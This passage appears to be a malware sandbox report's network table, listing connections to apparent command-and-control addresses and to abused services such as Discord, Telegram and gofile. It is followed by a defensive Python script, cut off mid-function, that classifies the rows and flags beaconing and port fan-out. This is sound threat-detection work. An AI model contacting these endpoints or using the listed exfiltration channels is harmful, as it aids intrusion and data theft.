US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 67.205.154.243:35184 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 JzyWtlVaDZyw.JzyWtlVaDZyw udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 cxlugg.sbs udp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
DE 193.161.193.99:35184 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.128.233:443 discord.com tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
RU 185.215.113.66:80 eveezueigohehla.co tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 126.123.112.45.in-addr.arpa udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52859 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
NL 92.123.77.34:80 r11.o.lencr.org tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 61.45.26.184.in-addr.arpa udp
US 8.8.8.8:53 34.77.123.92.in-addr.arpa udp
RU 185.215.113.66:80 eveezueigohehla.co tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52868 tcp
N/A 127.0.0.1:52877 tcp
N/A 127.0.0.1:52882 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 67.205.154.243:35184 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
N/A 127.0.0.1:52886 tcp
N/A 127.0.0.1:52889 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
DE 193.161.193.99:35184 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
KR 119.193.158.215:80 119.193.158.215 tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 215.158.193.119.in-addr.arpa udp
US 67.205.154.243:35184 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 millyscroqwp.shop udp
US 8.8.8.8:53 locatedblsoqp.shop udp
US 8.8.8.8:53 traineiwnqo.shop udp
US 8.8.8.8:53 condedqpwqm.shop udp
US 8.8.8.8:53 evoliutwoqm.shop udp
US 8.8.8.8:53 stagedchheiqwo.shop udp
US 8.8.8.8:53 JzyWtlVaDZyw.JzyWtlVaDZyw udp
US 8.8.8.8:53 blank-3st7o.in udp
CN 119.23.208.137:60001 tcp
US 8.8.8.8:53 bgteamtestapp.azurewebsites.net udp
US 8.8.8.8:53 stamppreewntnq.shop udp
US 52.173.134.115:80 bgteamtestapp.azurewebsites.net tcp
US 8.8.8.8:53 caffegclasiqwp.shop udp
US 8.8.8.8:53 steamcommunity.com udp
DE 23.42.16.93:443 steamcommunity.com tcp
US 8.8.8.8:53 ip-api.com udp
DE 193.161.193.99:35184 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 115.134.173.52.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.seetrol.com udp
US 8.8.8.8:53 gstatic.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
KR 139.150.75.206:80 www.seetrol.com tcp
FR 142.250.74.227:443 gstatic.com tcp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.75.150.139.in-addr.arpa udp
KR 3.36.173.8:50500 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
GB 20.26.156.215:443 github.com tcp
CO 181.131.217.244:1515 3diciembre.con-ip.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 67.205.154.243:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 20.109.209.108:80 www.update.microsoft.com tcp
DE 193.161.193.99:35184 tcp
IR 5.234.67.61:40500 tcp
SY 95.212.73.0:40500 udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 142.250.179.74:443 content-autofill.googleapis.com tcp
US 67.205.154.243:35184 tcp
KZ 92.47.143.122:40500 udp
FR 172.217.20.206:443 clients2.google.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 163.181.154.238:443 ldcdn.ldmnq.com tcp
PK 210.56.13.114:80 210.56.13.114 tcp
NL 190.2.142.115:80 download.emailorganizer.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
YE 134.35.104.95:40500 udp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
US 52.173.134.115:443 bingwallpaper.microsoft.com tcp
US 13.107.246.64:443 bingwallpaperimages.azureedge.net tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
CO 181.131.217.244:1515 newstaticfreepoint24.ddns-ip.net tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
AO 102.219.187.80:40500 udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
FR 142.250.179.74:443 content-autofill.googleapis.com tcp
CN 8.134.170.90:7777 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
GB 20.26.156.215:443 github.com tcp
FI 37.27.43.98:443 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
IR 2.185.189.167:40500 udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 20.223.54.233:443 links.duckduckgo.com tcp
US 8.8.8.8:53 233.54.223.20.in-addr.arpa udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 external-content.duckduckgo.com udp
FR 142.250.75.234:443 ajax.googleapis.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 185.199.109.153:443 lipis.github.io tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 185.199.109.153:443 lipis.github.io tcp
CN 221.231.39.69:80 windriversfiles.imeitools.com tcp
DE 193.161.193.99:35184 tcp
US 148.163.102.170:4782 tcp
DZ 41.102.19.3:40500 udp
US 162.159.136.232:443 discord.com tcp
US 104.26.13.205:443 api.ipify.org tcp
UZ 217.30.162.244:40500 tcp
FR 45.112.123.126:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
GB 184.25.193.234:443 www.microsoft.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
IR 151.241.114.78:40500 udp
US 162.159.136.232:443 discord.com tcp
US 67.205.154.243:35184 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 148.163.102.170:4782 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
KR 3.36.173.8:50500 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
RU 83.239.55.170:40500 udp
US 162.159.136.232:443 discord.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 162.159.136.232:443 discord.com tcp
KR 3.36.173.8:50500 tcp
DE 193.161.193.99:35184 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
RU 188.119.66.185:443 tcp
US 148.163.102.170:4782 tcp
US 162.159.136.232:443 discord.com tcp
RU 31.41.244.12:80 31.41.244.12 tcp
NL 31.214.157.206:2024 tcp
US 162.159.136.232:443 discord.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
US 162.159.136.232:443 discord.com tcp
HK 154.92.19.29:1231 154.92.19.29 tcp
US 162.159.136.232:443 discord.com tcp
IR 5.134.199.85:40500 udp
NL 149.154.167.99:443 t.me tcp
US 162.159.136.232:443 discord.com tcp
DE 23.42.16.93:443 steamcommunity.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
NL 149.154.167.99:443 t.me tcp
US 67.205.154.243:35184 tcp
IE 185.166.142.23:443 bitbucket.org tcp
US 148.163.102.170:4782 tcp
US 3.5.27.45:443 bbuseruploads.s3.amazonaws.com tcp
YE 46.161.245.208:40500 udp
N/A 127.0.0.1:55035 tcp
N/A 127.0.0.1:55051 tcp
N/A 127.0.0.1:55064 tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
NL 104.110.240.131:443 www.bing.com tcp
GB 104.86.110.120:443 tcp
DE 193.161.193.99:35184 tcp
US 20.42.65.90:443 browser.pipe.aria.microsoft.com tcp
US 20.140.56.69:443 fp-afd.azurefd.us tcp
N/A 127.0.0.1:55069 tcp
N/A 127.0.0.1:55080 tcp
N/A 127.0.0.1:55110 tcp
UZ 83.222.7.85:40500 udp
US 172.202.64.254:443 arc-ring.msedge.net tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 148.163.102.170:4782 tcp
YE 134.35.205.29:40500 tcp
KR 3.36.173.8:50500 tcp
US 67.205.154.243:35184 tcp
US 38.224.37.24:40500 udp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
IR 185.80.102.252:40500 udp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:30201 navegacionseguracol24vip.org tcp
NL 178.237.33.50:80 geoplugin.net tcp
RU 91.240.118.204:8000 91.240.118.204 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
UZ 89.236.217.71:40500 udp
RU 94.198.55.181:4337 tcp
RU 185.81.68.147:1912 tcp
US 67.205.154.243:35184 tcp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:1912 tcp
DE 212.113.107.84:80 212.113.107.84 tcp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
MX 189.133.187.71:40500 udp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 148.163.102.170:4782 tcp
N/A 172.16.16.140:40500 tcp
KR 3.36.173.8:50500 tcp
SG 216.107.138.162:40500 udp
US 67.205.154.243:35184 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 54.231.203.81:80 pentestfiles.s3.amazonaws.com tcp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
UZ 217.30.162.37:40500 udp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
YE 46.161.233.39:40500 udp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
GB 2.18.27.153:443 metadata.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 198.163.204.6:40500 udp
KR 3.36.173.8:50500 tcp
DE 193.161.193.99:35184 tcp
RU 188.119.66.185:443 tcp
NL 31.214.157.206:2024 tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
FR 82.64.156.123:80 tcp
NL 149.154.167.99:443 t.me tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
DE 23.42.16.93:443 steamcommunity.com tcp
NL 149.154.167.99:443 t.me tcp
UZ 45.150.26.122:40500 tcp
UZ 90.156.163.98:40500 udp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
CA 35.183.28.21:80 status.mycompliancereports.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 185.215.113.36:80 185.215.113.36 tcp
IR 5.232.155.0:40500 udp
US 3.165.224.162:443 d2e5gvivzj4g90.cloudfront.net tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
PK 202.70.150.106:40500 udp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
KR 3.36.173.8:50500 tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
FR 82.64.156.123:80 tcp
KR 3.36.173.8:50500 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
IR 188.215.221.55:40500 udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 home.sevjs17sr.top udp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
DE 193.161.193.99:35184 tcp
FR 82.64.156.123:80 tcp
UZ 89.236.219.80:40500 udp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
IR 89.219.115.156:40500 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 185.81.68.147:1912 tcp
US 67.205.154.243:35184 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
KZ 5.251.47.42:40500 udp
KR 3.36.173.8:50500 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
DE 193.161.193.99:35184 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 148.163.102.170:4782 tcp
KR 3.36.173.8:50500 tcp
UZ 89.249.62.7:40500 udp
US 216.239.36.21:443 virustotal.com tcp
US 216.239.36.21:443 virustotal.com tcp
RU 185.81.68.148:80 185.81.68.148 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 216.239.36.21:80 virustotal.com tcp
US 216.239.36.21:80 virustotal.com tcp
FR 82.64.156.123:80 tcp
US 67.205.154.243:35184 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
US 216.239.36.21:443 virustotal.com tcp
YE 178.130.103.42:40500 udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 148.163.102.170:4782 tcp
FR 172.217.20.206:443 clients2.google.com tcp
DE 193.161.193.99:35184 tcp
SY 82.137.218.134:40500 udp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
UZ 185.203.237.215:40500 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
KR 3.36.173.8:50500 tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 148.163.102.170:4782 tcp
IR 85.185.237.83:40500 udp
KR 3.36.173.8:50500 tcp
RU 188.119.66.185:443 tcp
DE 193.161.193.99:35184 tcp
US 162.159.135.234:443 gateway.discord.gg tcp
NL 149.154.167.99:443 t.me tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
NL 31.214.157.206:2024 tcp
IR 91.185.130.166:40500 udp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
FR 82.64.156.123:80 tcp
US 67.205.154.243:35184 tcp
IR 93.119.90.81:40500 udp
DE 23.42.16.93:443 steamcommunity.com tcp
US 148.163.102.170:4782 tcp
IR 93.118.99.152:40500 udp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
IR 2.191.14.149:40500 udp
KZ 46.36.149.47:40500 tcp
GB 20.26.156.215:80 github.com tcp
KR 3.36.173.8:50500 tcp
GB 20.26.156.215:443 github.com tcp
US 148.163.102.170:4782 tcp
US 67.205.154.243:35184 tcp
FI 37.27.43.98:443 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
UZ 90.156.160.6:40500 udp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
UZ 195.158.18.194:40500 udp
RU 185.81.68.147:80 185.81.68.147 tcp
US 67.205.154.243:35184 tcp
FR 82.64.156.123:80 tcp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
KR 3.36.173.8:50500 tcp
IR 2.181.218.207:40500 udp
RU 185.81.68.148:80 185.81.68.148 tcp
RU 90.189.250.159:40500 udp
IR 2.190.67.184:40500 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
FR 82.64.156.123:80 tcp
UZ 87.237.234.159:40500 udp
CO 181.131.217.244:1515 navegacionseguracol24vip.org tcp
IE 20.190.159.2:443 login.microsoftonline.com tcp
NL 31.214.157.206:2024 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:1842 navegacionseguracol24vip.org tcp
US 67.205.154.243:35184 tcp
KR 3.36.173.8:50500 tcp
FR 82.64.156.123:80 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
IR 5.219.134.102:40500 udp
NL 31.214.157.206:2024 tcp
KR 3.36.173.8:50500 tcp
US 148.163.102.170:4782 tcp
DE 193.161.193.99:35184 tcp
GB 104.86.110.120:443 tcp
KZ 82.200.228.118:40500 udp
YE 134.35.158.149:40500 udp
KZ 5.251.234.88:40500 udp
UZ 90.156.160.10:40500 udp
MX 187.223.139.73:40500 udp
KZ 92.46.228.246:40500 udp
IR 2.177.228.237:40500 udp
UZ 90.156.162.48:40500 udp
NE 41.138.38.164:40500 udp
IR 80.250.196.82:40500 udp
SY 88.86.12.98:40500 udp
UZ 89.249.62.14:40500 udp
UZ 90.156.160.30:40500 udp
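
The network table mixes resolver queries, sandbox and browser background traffic, abused hosting services (t.me, steamcommunity.com, raw.githubusercontent.com, pastebin.com, discord.com, gofile.io) and the connections that actually matter for blocking. The script below is an added example, not part of the original report, that parses the row format used above (country, ip:port, optional domain, protocol), discards resolver and local noise, classifies the rest, and surfaces the two C2-shaped patterns visible in this capture: repeated hits on one endpoint (for instance 148.163.102.170:4782 and 193.161.193.99:35184) and one port contacted on many unrelated IPs (the UDP/TCP 40500 fan-out across dozens of countries). The suffix lists, the 8.8.8.8 resolver assumption and the thresholds are the author's own heuristics; the sample rows are constructed by copying (abridged) rows from the table above.

```python
"""Triage of a sandbox network table (rows of: country ip:port [domain] proto).

Added example, not part of the original report.  It parses the row format the
Network table uses, drops resolver and local noise, separates OS/browser
background traffic from abused hosting services and direct-to-IP connections,
and surfaces two C2-shaped patterns: repeated hits on one endpoint (beaconing)
and one port contacted on many unrelated IPs (fan-out).  Suffix lists and
thresholds are the author's own heuristics, not the sandbox's signatures.
"""
import ipaddress
import re
from collections import Counter, defaultdict
from typing import NamedTuple, Optional

ROW_RE = re.compile(r"^(?P<cc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
                    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$")
RESOLVER = ("8.8.8.8", 53)          # assumption: the sandbox forwards DNS here
BENIGN = ("microsoft.com", "microsoft.net", "bing.com", "google.com", "googleapis.com",
          "gstatic.com", "duckduckgo.com", "office.net", "msedge.net", "lencr.org")
HOSTING = ("github.com", "githubusercontent.com", "github.io", "t.me", "steamcommunity.com",
           "discord.com", "discord.gg", "pastebin.com", "gofile.io", "bitbucket.org")
GEOIP = ("ip-api.com", "ipapi.co", "ipify.org", "geolocation-db.com", "geoplugin.net")


class Conn(NamedTuple):
    cc: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


def parse_rows(text: str) -> list:
    conns = []
    for line in filter(None, (l.strip() for l in text.splitlines())):
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        conns.append(Conn(m["cc"], m["ip"], int(m["port"]), m["domain"], m["proto"]))
    return conns


def _has_suffix(name: str, suffixes) -> bool:
    name = name.lower()
    return any(name == s or name.endswith("." + s) for s in suffixes)


def classify(c: Conn) -> str:
    addr = ipaddress.ip_address(c.ip)
    if (c.ip, c.port) == RESOLVER:
        return "dns"                    # query to the resolver, not a peer
    if addr.is_loopback or addr.is_multicast or addr.is_private:
        return "local"
    if c.domain is None or c.domain == c.ip:
        return "direct-ip"              # no name at all: typical of hard-coded C2
    for label, suffixes in (("benign", BENIGN), ("hosting", HOSTING), ("geoip-lookup", GEOIP)):
        if _has_suffix(c.domain, suffixes):
            return label
    return "other"


def summarize(conns, beacon_min: int = 2, fanout_min: int = 3) -> dict:
    classes, hits = Counter(), Counter()
    ips_per_port = defaultdict(set)
    queries, endpoints, domains = set(), set(), set()
    for c in conns:
        kind = classify(c)
        classes[kind] += 1
        if kind == "dns":
            if c.domain and not c.domain.lower().endswith(".in-addr.arpa"):
                queries.add(c.domain)   # forward lookups only; PTR noise dropped
            continue
        if kind in ("local", "benign"):
            continue
        hits[(c.ip, c.port, c.proto)] += 1
        if kind in ("direct-ip", "other"):
            endpoints.add(f"{c.ip}:{c.port}")
            ips_per_port[c.port].add(c.ip)
        if kind == "other":
            domains.add(c.domain.lower())
    return {
        "classes": classes,
        "dns_queries": queries,
        "beacons": {k: n for k, n in hits.items() if n >= beacon_min},
        "fanout_ports": {p: len(s) for p, s in ips_per_port.items() if len(s) >= fanout_min},
        "endpoints": endpoints,
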